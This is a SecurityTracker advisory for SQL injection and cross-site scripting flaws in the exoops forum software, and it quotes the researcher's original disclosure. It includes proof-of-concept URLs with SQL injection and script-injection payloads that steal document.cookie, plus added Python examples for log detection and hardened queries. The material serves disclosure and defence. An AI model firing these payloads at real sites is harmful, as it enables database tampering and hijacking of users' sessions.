Category:   Application (Forum/Board/Portal)  >   exoops
Vendors:   exoops.info
exoops Input Validation Flaws Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013566
SecurityTracker URL:  http://securitytracker.com/id/1013566
CVE Reference:   CVE-2005-0910, CVE-2005-0911
Updated:  Jul 7 2008
Original Entry Date:  Mar 27 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information
Exploit Included:  Yes  

Description:   Diabolic Crab reported some input validation vulnerabilities in exoops. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:

http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION

http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the exoops software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai

http://[target]/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the exoops software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exoops.info/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
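
For sites still running the affected scripts, one way to look for the request patterns described above in web server access logs (an added example, not part of the advisory or the exoops code). The script paths and parameter names are the ones listed in this entry; the combined log format, the sample lines and the assumption that each parameter should only ever carry an integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script paths and parameter names come from the advisory. Treating each
# parameter as integer-only is an assumption to confirm against the application.
INT_PARAMS = {
    "/modules/newbb/index.php": ("viewcat",),
    "/modules/newbb/viewforum.php": ("sortdays",),
    "/modules/sections/index.php": ("artid",),
}
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[0-9.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [27/Mar/2005:10:00:01 +0000] "GET /modules/newbb/index.php?viewcat=3 HTTP/1.1" 200 5120
198.51.100.7 - - [27/Mar/2005:10:00:05 +0000] "GET /modules/newbb/index.php?viewcat=%27SQL_INJECTION HTTP/1.1" 200 811
198.51.100.7 - - [27/Mar/2005:10:00:09 +0000] "GET /modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9 HTTP/1.1" 200 640
192.0.2.10 - - [27/Mar/2005:10:00:12 +0000] "GET /modules/sections/index.php?op=viewarticle&artid=9 HTTP/1.1" 200 7301
203.0.113.4 - - [27/Mar/2005:10:00:20 +0000] "GET /modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai HTTP/1.1" 200 9002
""".splitlines()


def non_integer_params(target):
    """Return (script, parameter, decoded value) for integer parameters carrying other data."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)  # percent-decodes values, '+' becomes a space
    hits = []
    for script, names in INT_PARAMS.items():
        if not parts.path.endswith(script):  # tolerate installs in a subdirectory
            continue
        for name in names:
            for value in query.get(name, []):
                if not re.fullmatch(r"[0-9]{1,10}", value):
                    hits.append((script, name, value))
    return hits


def scan(lines):
    """Return (client, script, parameter, decoded value) for every flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if match:
            client, target = match.groups()
            findings += [(client, *hit) for hit in non_integer_params(target)]
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded value rather than on raw strings such as `%3Cscript` keeps the rule independent of how a request was encoded.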


 Source Message Contents

Subject:  Multiple Sql injection, and multiple XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
 
Severity:  High
Title: Multiple Sql injection, and multiple XSS vulnerabilities in
Easy Community Management System Forum (E-XOOPS)
Date: March  28,  2005
 
Summary:
There are multiple sql injection, xss vulnerabilities in the Easy
Community Management System Forum (E-XOOPS)
Vendor: E-Xoops
Vendor website: www.exoops.info
 
Proof of Concept Exploits:
 
http://localhost/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai
Pops cookie
 

http://localhost/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
 

http://localhost/modules/newbb/index.php?viewcat='SQL_INJECTION
SQL ERROR AND POSSIBLE INJECTION
Error
 
SELECT f.*, u.uname, u.uid, p.topic_id, p.post_time, p.subject,
p.icon FROM e_xoops_bb_forums f LEFT JOIN e_xoops_bb_posts p ON
p.post_id = f.forum_last_post_id LEFT JOIN e_xoops_users u ON u.uid =
p.uid WHERE f.cat_id = \'SQL_INJECTION ORDER BY f.cat_id,
f.forum_name
 

http://localhost/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9
SQL ERROR AND POSSIBLE INJECTION
 
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
 
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
 

Possible fix: The usage of htmlspecialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions
for input validation before passing user input to the mysql database,
or before echoing data on the screen, would solve these problems.
 
Author:
These vulnerabilities have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Look out for my soon to come
out book on Secure coding with php.
 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
 
iQA/AwUBQkbLJCZV5e8av/DUEQJDWACfc/2aBR87DepZ2jVVTok2Pfww1cMAn0J3
HI/E6boKXH3OlGAch+b4z0me
=Yl6f
-----END PGP SIGNATURE-----
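
Added example, not part of the advisory or the exoops code: the error output quoted in the message shows the quote arriving as \' inside an unquoted comparison (f.cat_id = \'SQL_INJECTION), so this sketch contrasts quote escaping alone with integer validation plus a bound parameter. The table, the function names and the use of SQLite in place of MySQL are assumptions made so the example runs offline.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the forum table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE forums (forum_name TEXT, cat_id INTEGER)")
    db.executemany("INSERT INTO forums VALUES (?, ?)",
                   [("General", 1), ("Support", 2)])
    return db


def escape_quotes(value):
    """Backslash-escape quotes, the transformation visible in the error output."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def forums_concatenated(db, viewcat):
    """'Before' pattern: escaped input pasted into an unquoted numeric comparison."""
    sql = ("SELECT forum_name FROM forums WHERE cat_id = "
           + escape_quotes(viewcat) + " ORDER BY forum_name")
    return [row[0] for row in db.execute(sql)]


def forums_hardened(db, viewcat):
    """Accept only ASCII digits, then pass the value as a bound parameter."""
    if not (viewcat.isascii() and viewcat.isdigit() and len(viewcat) <= 10):
        raise ValueError("viewcat must be an integer")
    sql = "SELECT forum_name FROM forums WHERE cat_id = ? ORDER BY forum_name"
    return [row[0] for row in db.execute(sql, (int(viewcat),))]


def parsed_as_sql(db, viewcat):
    """True when the database rejects the statement, i.e. the input altered its syntax."""
    try:
        forums_concatenated(db, viewcat)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # "1" is an ordinary id; the other two values are the inputs quoted in the advisory.
    for value in ("1", "'SQL_INJECTION", "9, 9, 9"):
        print(repr(value), "breaks the escaped query:", parsed_as_sql(db, value))
```

Escaping changes nothing in "9, 9, 9" because the value contains no quote to escape, which is why the numeric parameters need type validation or parameter binding rather than string escaping.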
 
 

